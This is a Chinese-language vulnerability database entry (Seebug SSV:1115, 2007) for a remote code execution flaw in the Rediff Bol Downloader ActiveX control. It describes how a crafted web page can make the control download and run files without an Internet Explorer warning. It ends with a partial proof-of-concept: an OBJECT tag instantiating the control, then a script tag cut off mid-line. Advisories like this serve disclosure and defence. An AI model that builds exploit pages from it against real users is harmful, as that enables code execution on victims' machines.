Lucene search
RootSSV:1115HistoryJan 05, 2007 - 12:00 a.m.
Rediff Bol Downloader ActiveX控件远程代码执行漏洞
2007-01-0500:00:00
Root
www.seebug.org
9
Rediff Bol Downloader ActiveX控件是一款下载文件控件。
Rediff Bol Downloader ActiveX控件存在设计问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意命令。
Microsoft Internet Explorer在Downloader ActiveX控件指向Intenet上的可执行文件时,可报警,但是如果指向本地文件会没任何提示。构建恶意WEB页,诱使用户处理,可导致泄露敏感信息或下载执行任意命令。
Rediff Bol Downloader ActiveX control
目前没有解决方案提供:
<a href=“http://www.rediff.com/” target=“_blank”>http://www.rediff.com/</a>
[OBJECT id="rboldwn" WIDTH=445 HEIGHT=40
classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03"
codebase="http://imdownloads.rediff.com/newbol/Bol.CAB"]
[/OBJECT]
[script&